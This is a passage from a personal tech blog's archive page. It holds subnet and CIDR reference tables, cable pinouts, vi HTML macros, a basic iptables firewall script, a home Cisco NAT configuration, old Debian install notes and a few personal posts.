x.x.x.76     x.x.x.79
x.x.x.80     x.x.x.83
x.x.x.84     x.x.x.87
x.x.x.88     x.x.x.91
x.x.x.92     x.x.x.95
x.x.x.96     x.x.x.99
x.x.x.100    x.x.x.103
x.x.x.104    x.x.x.107
x.x.x.108    x.x.x.111
x.x.x.112    x.x.x.115
x.x.x.116    x.x.x.119
x.x.x.120    x.x.x.123
x.x.x.124    x.x.x.127
x.x.x.128    x.x.x.131
x.x.x.132    x.x.x.135
x.x.x.136    x.x.x.139
x.x.x.140    x.x.x.143
x.x.x.144    x.x.x.147
x.x.x.148    x.x.x.151
x.x.x.152    x.x.x.155
x.x.x.156    x.x.x.159
x.x.x.160    x.x.x.163
x.x.x.164    x.x.x.167
x.x.x.168    x.x.x.171
x.x.x.172    x.x.x.175
x.x.x.176    x.x.x.179
x.x.x.180    x.x.x.183
x.x.x.184    x.x.x.187
x.x.x.188    x.x.x.191
x.x.x.192    x.x.x.195
x.x.x.196    x.x.x.199
x.x.x.200    x.x.x.203
x.x.x.204    x.x.x.207
x.x.x.208    x.x.x.211
x.x.x.212    x.x.x.215
x.x.x.216    x.x.x.219
x.x.x.220    x.x.x.223
x.x.x.224    x.x.x.227
x.x.x.228    x.x.x.231
x.x.x.232    x.x.x.235
x.x.x.236    x.x.x.239
x.x.x.240    x.x.x.243
x.x.x.244    x.x.x.247
x.x.x.248    x.x.x.251
x.x.x.252    x.x.x.255

net mask:

1111 11 00 == 252

Pozar's two-bit(tm) addressing

4-bit  m m m m
2-bit  m m
(.1)   0 0 0 0  0 0 0 1           (.2) 0 0 0 0  0 0 1 0
(.17)  0 0 0 1  0 0 0 1          (.18) 0 0 0 1  0 0 1 0
(.33)  0 0 1 0  0 0 0 1          (.34) 0 0 1 0  0 0 1 0
(.49)  0 0 1 1  0 0 0 1          (.50) 0 0 1 1  0 0 1 0
(.65)  0 1 0 0  0 0 0 1          (.66) 0 1 0 0  0 0 1 0
(.129) 1 0 0 0  0 0 0 1         (.130) 1 0 0 0  0 0 1 0
(.193) 1 1 0 0  0 0 0 1         (.194) 1 1 0 0  0 0 1 0
(.225) 1 1 1 0  0 0 0 1         (.226) 1 1 1 0  0 0 1 0



CIDR:  Classless Inter-Domain Routing -- Standard Boundaries

                                        (inverse mask)
Netmask         bits # IPs      # C's   source-wildcard

255.255.255.255 /32  1          <        0.0.0.0
255.255.255.254 /31  2          <        0.0.0.1
255.255.255.252 /30  4          <        0.0.0.3
255.255.255.248 /29  8          <        0.0.0.7
255.255.255.240 /28  16         <        0.0.0.15
255.255.255.224 /27  32         <        0.0.0.31
255.255.255.192 /26  64         <        0.0.0.63
255.255.255.128 /25  128        <        0.0.0.127
255.255.255.0   /24  256        1        0.0.0.255
255.255.254.0   /23  512        2        0.0.1.255
255.255.252.0   /22  1024       4        0.0.3.255
255.255.248.0   /21  2048       8        0.0.7.255
255.255.240.0   /20  4096       16       0.0.15.255
255.255.224.0   /19  8192       32       0.0.31.255
255.255.192.0   /18  16384      64       0.0.63.255
255.255.128.0   /17  32768      128      0.0.127.255
255.255.0.0     /16  65536      256      0.0.255.255
255.254.0.0     /15  131072     512      0.1.255.255
255.252.0.0     /14  262144     1024     0.3.255.255
255.248.0.0     /13  524288     2048     0.7.255.255
255.240.0.0     /12  1048576    4096     0.15.255.255
255.224.0.0     /11  2097152    8192     0.31.255.255
255.192.0.0     /10  4194304    16384    0.63.255.255
255.128.0.0     /9   8388608    32768    0.127.255.255
255.0.0.0       /8   16777216   65536    0.255.255.255
254.0.0.0       /7   33554432   131072   1.255.255.255
252.0.0.0       /6   67108864   262144   3.255.255.255
248.0.0.0       /5   134217.72K 524288   7.255.255.255
240.0.0.0       /4   268435.44K 1048576  15.255.255.255
224.0.0.0       /3   536870.88K 2097152  31.255.255.255
192.0.0.0       /2   1073741.7K 4194304  63.255.255.255
128.0.0.0       /1   2147483.4K 8388608  127.255.255.255
0.0.0.0         /0   4294966.8K 16777216 255.255.255.255

----------

Here's some general rules about how this allocation works.  Keep in mind that
all of these "masks" are really based on binary AND/OR masking, thus a
decimal "255" is binary 11111111 and a decimal "0" is binary "00000000".
Here's a little table in binary which may be of help:

255.255.255.255 /32  11111111.11111111.11111111.11111111
255.255.255.254 /31  11111111.11111111.11111111.11111110
255.255.255.252 /30  11111111.11111111.11111111.11111100
255.255.255.248 /29  11111111.11111111.11111111.11111000
255.255.255.240 /28  11111111.11111111.11111111.11110000
255.255.255.224 /27  11111111.11111111.11111111.11100000
255.255.255.192 /26  11111111.11111111.11111111.11000000
255.255.255.128 /25  11111111.11111111.11111111.10000000
255.255.255.0   /24  11111111.11111111.11111111.00000000
255.255.254.0   /23  11111111.11111111.11111110.00000000
255.255.252.0   /22  11111111.11111111.11111100.00000000
255.255.248.0   /21  11111111.11111111.11111000.00000000
255.255.240.0   /20  11111111.11111111.11110000.00000000
255.255.224.0   /19  11111111.11111111.11100000.00000000
255.255.192.0   /18  11111111.11111111.11000000.00000000
255.255.128.0   /17  11111111.11111111.10000000.00000000
255.255.0.0     /16  11111111.11111111.00000000.00000000
... etc ...

A /32 is an allocation of   1 IP,   and there is 256 /32's in a /24.
A /31 is an allocation of   2 IP's, and there is 128 /31's in a /24.
A /30 is an allocation of   4 IP's, and there is  64 /30's in a /24.
A /29 is an allocation of   8 IP's, and there is  32 /29's in a /24.
A /28 is an allocation of  16 IP's, and there is  16 /28's in a /24.
A /27 is an allocation of  32 IP's, and there is   8 /27's in a /24.
A /26 is an allocation of  64 IP's, and there is   4 /26's in a /24.
A /25 is an allocation of 128 IP's, and there is   2 /25's in a /24.
A /24 is an allocation of 256 IP's, and there is   1 /24   in a /24.

----------

Starting "Network" IP address of Subnetted /24's (last octet value):
        NOTE:  *0 - Zero subnet may not functional on ALL CPE types

/32:    Any IP is an individual /32.
/31:    IP evenly divisible by 2. (e.g. *0,2,4,6,8,10,12,14,16,18 ... 252,254)
/30:    IP evenly divisible by 4. (e.g. *0,4,8,12,16,20,24,28,32, ... 248,252)
/29:    IP evenly divisible by 8. (e.g. *0,8,16,24,32,40,48,56,64, ... 240,248)
/28:    IP evenly divisible by 16. (e.g. *0,16,32,48,64,80,96,112, ... 224,240)
/27:    IP evenly divisible by 32. (e.g. *0,32,64,96,128,160,192,224)
/26:    IP evenly divisible by 64. (e.g. *0,64,128,192)

Slow Down

Tue, 30 May 2017 07:50:18 -0500

“Life moves pretty fast. If you don’t stop and look around once in a while, you could miss it.” — Ferris Bueller

There is a never-ending dialogue of information swirling around within my head; the next idea, the next task, the next big project, the next lesson learned to be put into practice. The list of things that demand some amount of attention never seems to end. Finding the time to focus on a single task seemed like an arduous battle that could not be overcome, until I realized that I need to do one simple thing, “slow down.” In hindsight, this seems both obvious and simple, but for me it was neither. It took a long time of self-reflection and critical feedback, to realize there was a problem. I could no longer sustain the multi-tasking, context switching, never-ending-list lifestyle.

Quiting XO Communications to work at WashU

Tue, 06 Dec 2005 15:48:59 -0600

I quit XO Communications to take this job:

Job Title: NETWORK SYSTEMS ENGINEER (UNIX) Reference Code: 060099

Job Type (FT/PT): FULL TIME

Department: NETWORK TECHNOLOGY SERVICES

Minimum of Monthly Salary Range: Compensation will be commensurate with experience.

Midpoint of Monthly Salary Range: Compensation will be commensurate with experience.

Requirements: MUST HAVE A BACHELOR’S DEGREE IN COMPUTER SCIENCE OR A RELATED FIELD. MUST HAVE 5 YEARS EXPERIENCE IN SYSTEMS ADMINISTRATION AND DESIGN, AND ADVANCED UNDERSTANDING OF UNIX AND LINUX. STRONG PROBLEM SKILLS AND PROJECT MANAGEMENT SKILLS IS REQUIRED. DEMONSTRATED INTERPERSONAL, COMMUNICATION AND ORGANIZATIONAL SKILLS AND ABILITY AND WILLINGNESS TO MULTI-TASK AND PERFORM VARIED DUTIES IN A SHORT SPAN OF TIME IS REQUIRED. MASTER’S DEGREE IN COMPUTER SCIENCE OR RELATED FIELD OR EQUIVALENT EXPERIENCE IS PREFERRED. MODERATE MICROSOFT WINDOWS SERVER PLATFORMS EXPERIENCE, EXPERIENCE CONFIGURING AND ADMINISTERING HP OPENVIEW, AND EXPERIENCE WITH SAN TECHNOLOGIES IS PREFERRED.

Jokers Crossing

Sun, 27 Nov 2005 15:36:16 -0600

Jokers Crossing - ADAM

In 1995 Matt Hill and Jason Murray recorded their first album.

The bass and drum tracks were layed down in Jason's barn on a Tascam 4 track. Vocal, guitars, and some percussion was layed down at Whitehead Studios.

The quality of the bass and drum tracks from the analog 4 track brought down the whole tape. In 2005 Jason remastered the entire album. Using Ubuntu Linux, Audacity, a portable walkman, and a $5 cable from Radio Shack. The analog tape was converted to digital and the audio quality was cleaned up a bit. However, the audio is low and washed out. There is little to no high-end and the bass and lows tend to clip. I am no sound engineer, it is the best I can do with little experience. At least the tape hiss is gone!

Cameras, The New Weapon of Mass Destruction

Tue, 24 Aug 2004 17:57:34 -0500

Here is my story of how I was ‘detained’ and ‘interrogated’ as a possible terrorist suspect by the FBI counterterrorism division of Chicago, IL.

It was a normal day heading to work in Chicago, IL this Tuesday morning 8/24/2004. It was my last day working in Downtown Chicago. I will be moving to Missouri this weekend. I took the same Metra train that I have for the past 4 years, the 7:17 AM leaving the route 59 station arriving in Downtown Chicago Union Station at 8:00 AM. I brought my camera with me today to take pictures on my last day downtown. When I arrived at Union Station I took a picture of the train car that I sit in, trains, rails, train station, etc. On the way out of union station, I took pictures of all the people walking around the area, a homeless guy asking for money, and various other things on my walk to the office.

Ethernet, T1, E1 pinouts

Mon, 07 Jun 2004 19:40:44 -0600

Standard Ethernet (568B)
------------------------
1 WhiteOrange 	<->	WhiteOrange
2 Orange	<->	Orange
3 WhiteGreen	<->	WhiteGreen
4 Blue		<->	Blue
5 WhiteBlue	<->	WhiteBlue
6 Green		<->	Green
7 WhiteBrown	<->	WhiteBrown
8 Brown		<->	Brown

Standard Ethernet (568B) Cross-Over
-----------------------------------
1 WhiteOrange 	<->	WhiteGreen
2 Orange	<->	Green
3 WhiteGreen	<->	WhiteOrange
4 Blue		<->	Blue
5 WhiteBlue	<->	WhiteBlue
6 Green		<->	Orange
7 WhiteBrown	<->	WhiteBrown
8 Brown		<->	Brown

Standard Ethernet (568A)
------------------------
1 WhiteGreen	<->	WhiteGreen
2 Green		<->	Green
3 WhiteOrange 	<->	WhiteOrange
4 Blue		<->	Blue
5 WhiteBlue	<->	WhiteBlue
6 Orange	<->	Orange
7 WhiteBrown	<->	WhiteBrown
8 Brown		<->	Brown

Standard Ethernet (568A) Cross-Over
-----------------------------------
1 WhiteGreen	<->	WhiteOrange
2 Green		<->	Orange
3 WhiteOrange 	<->	WhiteGreen
4 Blue		<->	Blue
5 WhiteBlue	<->	WhiteBlue
6 Orange	<->	Green
7 WhiteBrown	<->	WhiteBrown
8 Brown		<->	Brown

T1/E1 Cross-Over
----------------
1 WhiteOrange 	<->	Blue
2 Orange	<->	WhiteBlue
3 WhiteGreen	<->	WhiteGreen
4 Blue		<->	White Orange
5 WhiteBlue	<->	Orange
6 Green		<->	Green
7 WhiteBrown	<->	WhiteBrown
8 Brown		<->	Brown

My history with technology

Tue, 17 Feb 2004 17:08:06 -0600

In the early 1980s I started with my uncles computer, an Apple ][+. This is where I first started to peek and poke my way around the Apple Basic programming language. I was only around 5 or 6 at the time.

Then around 1984 my dad bought a Tandy TRS-80 "portable" computer with a 40x25 LCD display. This system had a built in 300bps modem that was used to transmit orders from my dads company to the warehouse. This is when I was first introduced to dial up BBSs, and the beginning of my "online career".

Base conversion with bc

Sat, 15 Nov 2003 19:38:26 -0600

Base Conversion with bc:

jemurray@remington:~$ bc
bc 1.06
Copyright 1991-1994, 1997, 1998, 2000 Free Software Foundation, Inc.
This is free software with ABSOLUTELY NO WARRANTY.
For details type `warranty'. 
obase=10
ibase=16

C0A8

49320

HTML Macros for vi

Mon, 08 Sep 2003 19:06:37 -0600

" HTML Macros
"
"	These are bar far the best set of VI HTML 
"	macros that I have used.  To my knowledge
"	there is no more of an extensive list as this.
"	
"	However Doug Renze who created them does not seem
"	to exist anymore.  I can't located him to see if
"	he has updated them or anything, so I will leave
"	his cudos here, and mirror these macros on my site.
"
"	Doug Renze
"	http://www.avalon.net/~drenze/
"	mailto:drenze@avalon.net
"
"	Typically you will put this file into your
"	home directory like so: ~/.exrc
"
"	Current location:
"	https://jasonmurray.org/
"
"
" General Markup Tags
"
"	Comment Tag
map! ;cm <!--  -->Bhi
"
"	A HREF	Anchor Hyperlink	HTML 2.0
map! ;ah <A HREF=""></A>?"
i
"
"	A NAME	Named Anchor		HTML 2.0
map! ;an <A NAME=""></A>?"
i
"
"	ABBREV	Abbreviation		HTML 3.0
"map! ;ab <ABBREV></ABBREV>bhhi
"
"	ACRONYM				HTML 3.0
"map! ;ac <ACRONYM></ACRONYM>bhhi
"
"	ADDRESS				HTML 2.0
map! ;ad <ADDRESS></ADDRESS>bhhi
"
"	AU	Author			HTML 3.0
"map! ;au <AU></AU>bhhi
"
"	B	Boldfaced Text		HTML 2.0
"map! ;bo <B></B>hhhi
"
"	BANNER				HTML 3.0
"map! ;ba <BANNER></BANNER>bhhi
"
"	BASE				HTML 2.0	HEADER
map! ;bh <BASE HREF="">hi
"
"	BASEFONT			NETSCAPE
"map! ;bf <BASEFONT SIZE=>i
"
"	BIG				HTML 3.0
"map! ;bi <BIG></BIG>bhhi
"
"	BLOCKQUOTE			HTML 2.0
map! ;bl <BLOCKQUOTE>
</BLOCKQUOTE>O
"
"	BODY				HTML 2.0
map! ;bd <BODY>
</BODY>O
"
"	BQ	Blockquote		HTML 3.0
"map! ;bq <BQ></BQ>bhhi
"
"	BR	Line break		HTML 2.0
map! ;br <BR>
"
"	CAPTION				HTML 3.0
"map! ;ca <CAPTION></CAPTION>bhhi
"
"	CENTER				NETSCAPE
map! ;ce <CENTER></CENTER>bhhi
"
"	CITE				HTML 2.0
map! ;ci <CITE></CITE>bhhi
"
"	CODE				HTML 2.0
map! ;co <CODE></CODE>bhhi
"
"	CREDIT				HTML 3.0
"map! ;cr <CREDIT></CREDIT>bhhi
"
"	DEFINITION LIST COMPONENTS	HTML 2.0
"		DL	Definition List
"		DT	Definition Term
"		DD	Definition Body
map! ;dl <DL>
</DL>O	
map! ;dt <DT>
map! ;dd <DD>
"
"	DEL	Deleted Text		HTML 3.0
"map! ;de <DEL></DEL>bhhi
"
"	DFN	Defining Instance	HTML 3.0
"map! ;df <DFN></DFN>bhhi
"
"	DIR	Directory List		HTML 3.0
"map! ;di <DIR>
</DIR>O	
"
"	DIV	Document Division	HTML 3.0
"map! ;dv <DIV></DIV>bhhi
"
"	EM	Emphasize		HTML 2.0
map! ;em <EM></EM>bhhi
"
"	FIG	Figure			HTML 3.0
"map! ;fi <FIG SRC=""></FIG>?"
i
"
"	FN	Footnote		HTML 3.0
"map! ;fn <FN></FN>bhhi
"
"	FONT				NETSCAPE
"map! ;fo <FONT SIZE=></FONT>bhhhi
"
"	HEADERS, LEVELS 1-6		HTML 2.0
map! ;h1 <H1></H1>bhhi
map! ;h2 <H2></H2>bhhi
map! ;h3 <H3 ALIGN=CENTER></H3>bhhi
map! ;h4 <H4 ALIGN=CENTER></H4>bhhi
map! ;h5 <H5 ALIGN=CENTER></H5>bhhi
map! ;h6 <H6 ALIGN=CENTER></H6>bhhi
"
"	HEAD				HTML 2.0
map! ;he <HEAD>
</HEAD>O
"
"	HR	Horizontal Rule		HTML 2.0 W/NETSCAPISM
map! ;hr <HR WIDTH=100%>
"
"	HTML				HTML 3.0
map! ;ht <HTML>
</HTML>O
"
"	I	Italicized Text		HTML 2.0
"map! ;it <I></I>hhhi
"
"	IMG	Image			HTML 2.0
map! ;im <IMG SRC="" ALT="">Bhhi
"
"	INS	Inserted Text		HTML 3.0
"map! ;in <INS></INS>bhhi
"
"	ISINDEX	Identifies Index	HTML 2.0
map! ;ii <ISINDEX>
"
"	KBD	Keyboard Text		HTML 2.0
map! ;kb <KBD></KBD>bhhi
"
"	LANG	Language Context	HTML 3.0
"map! ;la <LANG LANG=""></LANG>?"
i
"
"	LI	List Item		HTML 2.0
map! ;li <LI>
"
"	LINK				HTML 2.0	HEADER
map! ;lk <LINK HREF="">hi
"
"	LH	List Header		HTML 2.0
map! ;lh <LH></LH>bhhi
"
"	MENU				HTML 2.0
map! ;mu <MENU>
</MENU>O	
"
"	META	Meta Information	HTML 2.0	HEADER
map! ;me <META NAME="" CONTENT="">Bhhi
"
"	NOBR	No Break		NETSCAPE
"map! ;nb <NOBR></NOBR>bhhi
"	NOTE				HTML 3.0
"map! ;no <NOTE></NOTE>bhhi
"
"	OL	Ordered List		HTML 3.0
map! ;ol <OL>
</OL>O	
"
"	OVERLAY	Overlay Image		HTML 3.0
"map! ;ov <OVERLAY SRC="">hi
"
"	P	Paragraph		HTML 3.0
map! ;pp <P></P>hhhi
"
"	PRE	Preformatted Text	HTML 2.0
map! ;pr <PRE>
</PRE>O
"
"	Q	Quote			HTML 3.0
"map! ;qu <Q></Q>hhhi
"
"	RANGE				HTML 3.0
"map! ;ra <RANGE FROM= UNTIL=>Bhi
"
"	S	Strikethrough		HTML 3.0
"map! ;sk <S></S>hhhi
"	SAMP	Sample Text		HTML 2.0
map! ;sa <SAMP></SAMP>bhhi
"	SMALL	Small Text		HTML 3.0
"map! ;sm <SMALL></SMALL>bhhi
"	SPOT				HTML 3.0
"map! ;sp <SPOT ID=>i
"
"	STRONG				HTML 2.0
map! ;st <STRONG></STRONG>bhhi
"	STYLE				HTML 3.0
"map! ;sn <STYLE NOTATION="">
</STYLE>k/"
a
"	SUB	Subscript		HTML 3.0
"map! ;sb <SUB></SUB>bhhi
"	SUP	Superscript		HTML 3.0
"map! ;sp <SUP></SUP>bhhi
"
"	TAB				HTML 3.0
"map! ;ta <TAB>
"	TITLE				HTML 2.0	HEADER
map! ;ti <TITLE></TITLE>bhhi
"	TT	Teletype Text		HTML 2.0
"map! ;tt <TT></TT>bhhi
"
"	U	Underlined Text		HTML 2.0
"map! ;uu <U></U>hhhi
"	UL	Unordered List		HTML 2.0
map! ;ul <UL>
</UL>O	
"
"	V	Variable		HTML 3.0
"map! ;vv <V></V>hhhi
"
"	WBR	Word Break		NETSCAPE
"map! ;wb <WBR>
" 	Special Characters
map! ;& &amp;
map! ;K &copy;
map! ;" &quot;
map! ;< &lt;
map! ;> &gt;

Linux IPtables rules

Wed, 23 Jul 2003 19:35:43 -0600

Used in /etc/network/if-up.d/S01tables

#!/bin/bash

modprobe ip_tables
modprobe iptable_filter
modprobe iptable_mangle
modprobe iptable_nat
modprobe ipt_state
modprobe ipt_REJECT
modprobe ipt_LOG

iptables --flush

iptables -P INPUT DROP

iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -p tcp -m tcp --tcp-flags ACK ACK -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -m state --state RELATED -j ACCEPT
iptables -A INPUT -p icmp -m icmp --icmp-type echo-reply -j ACCEPT
iptables -A INPUT -p icmp -m icmp --icmp-type destination-unreachable -j ACCEPT
iptables -A INPUT -p icmp -m icmp --icmp-type source-quench -j ACCEPT
iptables -A INPUT -p icmp -m icmp --icmp-type time-exceeded -j ACCEPT
iptables -A INPUT -p icmp -m icmp --icmp-type parameter-problem -j ACCEPT
iptables -A INPUT -p tcp -m tcp --source 192.168.99.0/24 --dport 20 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --source 192.168.99.0/24 --dport 21 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --source 192.168.99.0/24 --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --source 192.168.99.0/24 --dport 80 -j ACCEPT
iptables -A INPUT -p udp -m udp --source 192.168.99.0/24 --dport 69 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --source 192.168.99.0/24 --dport 179 -j ACCEPT
iptables -A INPUT -j LOG
iptables -A INPUT -j REJECT

NAT configuration on Cisco router

Sat, 25 Jan 2003 19:33:43 -0600

!
! Last configuration change at 14:43:17 CST Sat Jan 25 2003
!
version 11.3
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
ip host-routing
ip nat pool external-addr 66.88.33.189 66.88.33.189 netmask 255.255.255.248
ip nat inside source list 10 pool external-addr overload
no ip finger
ip name-server 65.106.1.196
clock timezone CST -6
!
!
process-max-time 200
!
interface Loopback0
 no ip address
!
interface Ethernet0
 description private interface
 ip address 192.168.99.1 255.255.255.0
 ip nat inside
!
interface Ethernet1
 description public interface
 ip address 66.88.33.190 255.255.255.248
 ip nat outside
!
interface Serial0
 no ip address
 no ip mroute-cache
 shutdown
!
ip default-gateway 66.88.33.185
ip classless
!
logging buffered 4096 debugging
access-list 1 deny   any log
access-list 2 permit any
access-list 10 permit 192.168.99.0 0.0.0.255
access-list 11 permit 192.168.99.0 0.0.0.255
access-list 100 deny   udp any any eq 1434 log
access-list 100 permit ip any any
!
line con 0
line vty 0 4
 access-class 11 in
 login
!
ntp clock-period 17041922
ntp server 206.173.119.88
end

How to Install Debian GNU/Linux on the Toshiba 2545XCDT

Tue, 13 Jun 2000 19:10:23 -0600

How to Install Debian GNU/Linux on the Toshiba 2545XCDT
-------------------------------------------------------

Author: Jason E. Murray
Date: 6/13/00
Notes: This document is quite dated, but left here for reference. 2002.8.30

- Backup your current system (if it exists).

- Build the disks
	- Get the boot/root/driver disks from ftp.debian.org
	- I prefer the unstable release (newest)
	- $ dd if=(disk) of=/dev/fd0

- Inital Bootup
	- Boot from rescue disk
	- Insert root floppy when prompted
	
- Inital Configuration Menus
	- Configure Keyboard (US/Qwerty)
	- Partition Disk
		/dev/hda1 = Win98 (2GB)
			-Bootable
		/dev/hda2 = Linux Swap (131MB)
		/dev/hda3 = Linux Ext2 (2.1GB)
	- Initalize Swap
	- Initalize Linux Partition
		- Check for bad blocks
		- Block Size 4096; Frag Size=4096
		  265472 Inodes; 530145 blocks
		  5.0% reserved; 
		  Backup Superblocks: 32768, 98304, 163840, 229376, 294912
	- Mount / filesystem
	- Install OS Kernel and modules
		- Use Resuce disk to get kernel
		- Use Drivers disk 1-3 for modules
	- Configure device driver modules
		- Nothing to configure in here
	- Configure PCMCIA
		- Select Intel i82365
	- Configure the hostname
		- Set to LAPTUX
	- Configure the Network
		- eth0 is pcmcia
		- ip = 208.176.45.82
		- netmask = 255.255.255.240
		- gateway = 208.176.45.81
	- Install Base System
		- Install via network (http)
		- Retreive base2_2.tgz from http.us.debian.org
		- path: debian/dists/potato/main/disks-i386/current
		- Potato release
	- Configure the base system
		- Configure TimeZone
			- US -> Central.
		- Hardware clock set to local time
	- Make linux boot directly from hard disk
		- Install LILO in MBR (/dev/hda)
	- Make boot floppy
		- I would do this!
	- Reboot System

Configuring the New System

	- Install MD5 Passwords
	- Install Shadow Passwords
	- Set root password
	- Setup a non-root account (jemurray)
	- Dont use PPP to configure the new system
		- Use Network
	- APT Configuration
		- Use http for apt GET method
		- Allow non-US, non-free.
		- Contry: US
		- Use: http.us.debian.org
		- No Proxy
		- No more APT sources
	- Packages to Install (System Configuration)
		- Choose ADVANCED
		- ...Learn how to use dselect...
		- To begin with I just let is select the standard
		  utilities, then I will add as I need them.

This is all there is to the "generic installation".  

Debian is by far the best GNU/Linux distribution that I have used so far.  The
package management utility (dselect) makes this the easiest system to keep
updated.  HOWEVER, I would suggest that if you do not know how to dowload,
configure, compile software yourself, that you first learn it before you
starting relying on dselect to do it for you...



Additional Information
----------------------

- Upgraded kernel to 2.2.16
	- Required the kernel source
	- Requires the pcmcia modules
		- These are not built into the kernel you need the 
		  pcmcia-cs package in order to get pcmcia cards working
	- enabled APM support - debian has this turned off by default.

- Audio Configuration
	- I copied the /etc/modules.conf from the Documentation for the OPL3-SA2 that cames with the kernel

		  alias char-major-14 opl3sa2
		  pre-install opl3sa2 modprobe "-k" "ad1848"
		  post-install opl3sa2 modprobe "-k" "opl3"
		  options opl3sa2 io=0x220 mss_io=0x530 mpu_io=0x330 irq=5 dma=1 dma2=0

	- I also needed to change the audio device (/dev) permissions to 666

Jason Murray

Process Resource Tracker

Overview

The Details

Using uv to manage pyton projects

Webserver Upgraded to Debian 13

Why the Scientific Method Matters

Short Bio

I'm Sorry

What am I doing right NOW?

Last Updated: Aug 8, 2025

Family

Personal Life

Work

Facebook

Contact Information

Email

Social

Secure Communication

It's Hard to Write

One Year Later: Dec 04, 2023

One Year Later: Dec 03, 2023

One Year Later: Dec 02, 2023

One Year Later: Dec 01, 2023

One Year Later: Nov 30, 2023

One Year Later: Nov 29, 2023

One Year Later: Nov 28, 2023

One Year Later: Nov 27, 2023

Using iplocate to geolocate IP addresses in Splunk.

Overview

Technical Details

How I Met Your Mother

Convert all HEIC images to jpeg with a single command

Overview

Technical Details

Would have been our 24 year anniversary

Open Letter from Jami: Bad Behavior Is Not an Option

Jami's Obituary

Obituary

The Final Update Until We Celebrate Life

How's Jami Doing: Daily Update - Issue #5 - 12/4/2022

How's Jami Doing: Daily Update - Issue #4 - 12/3/2022

How's Jami Doing: Daily Update - Issue #3.5 - 12/2/2022

How's Jami Doing: Friends and Family Matter - Issue #3 - 12/2/2022

How's Jami Doing: Daily Update - Issue #2 - 12/1/2022

How's Jami Doing: The Big Update - Issue #1 - 11/30/2022

Scooby-Doo and Reflection

Scooby-Doo

Reflection

Fake Phishing: Setup, detection, and take-down

Overview

Install Win11 Dev VMware Image on the Proxmox Hypervisor

Overview

Details

Assumptions and Environment

Download the Windows 11 Dev Image

Create a new VM

Convert Win11 VMDK to QCOW2

Edit the VM configuration to use the new qcow2 image

Boot the VM using the Proxmox console

Setup Opencanary Honeypot with Pushover Notifications

Overview

Assumptions and Environment

Technical Details

Proxmox Initial Setup in my Home Lab

Overview

Technical Details

Assumptions and Environment

Create the Boot Media (using macOS)

Boot from USB Drive and Install

Web or SSH Into the New Server

Export Infoblox IPv4 Networks into Splunk Lookup Table

Technical Details

Using PowerShell to parse Office 365 TimeStamps in JSON format

Google G-Suite Legacy to Google Workspace

Overview

Discover. Create. Solve.

Connecting to old ssh servers with unsupported key exchange and cipher types

Temporary Fix

Zeek Installation and Splunk CIM Data Normalization Guide

Edit the VM configuration to use the new `qcow2` image